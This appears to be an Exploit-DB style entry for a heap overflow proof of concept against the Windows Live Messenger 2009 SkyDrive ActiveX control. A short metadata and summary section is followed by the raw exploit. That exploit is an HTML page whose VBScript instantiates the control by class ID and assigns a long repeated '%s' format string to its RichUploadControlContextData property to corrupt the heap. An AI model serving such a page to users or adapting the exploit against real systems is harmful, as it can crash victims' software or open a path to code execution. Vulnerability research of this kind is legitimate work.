Windows Live Messenger 2009 ActiveX Heap Overflow PoC

vendor:

Windows Live Messenger

by:

SarBoT511

5.5

CVSS

MEDIUM

Heap Overflow

Unknown

CWE

Product Name: Windows Live Messenger

Affected Version From: Windows Live Messenger 2009

Affected Version To: Windows Live Messenger 2009

Patch Exists: NO

Related CWE: Unknown

CPE: a:microsoft:windows_live_messenger:2009

Metasploit:

Other Scripts:

Platforms Tested: Windows 7, Vista, XP SP3

Unknown

Windows Live Messenger 2009 ActiveX Heap Overflow PoC

This exploit targets the Windows Live Messenger 2009 ActiveX component. It causes a heap overflow in the RichUploadControlContextData property of the component, leading to potential code execution or denial of service. The exploit is written in VBScript and sets a specially crafted value to the property.

Mitigation:

Apply the latest security patches and updates from the vendor.

Source

Exploit-DB raw data:

#Aouther : [SarBoT511] (xs3@hotmail.com)
#Exploits title :[Windows Live Messenger 2009 ActiveX Heap Overflow PoC]
#tested on :[windows 7 & Vista & Xp sp3]
#Windows Live Messenger SkyDrive 2009

<html>
<object classid='clsid:C2828995-4A83-4100-A212-3024BA117356' id='target' ></object>
<script language='vbscript'>
targetFile = "C:\Program Files\Windows Live SkyDrive\Microsoft.Live.Folders.RichUpload.3.dll"
prototype  = "Property Let RichUploadControlContextData As String"
memberName = "RichUploadControlContextData"
progid     = "RichUploadLib.UploadControl"
argCount   = 1
 
arg1="%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s"
 
target.RichUploadControlContextData = arg1
 
</script>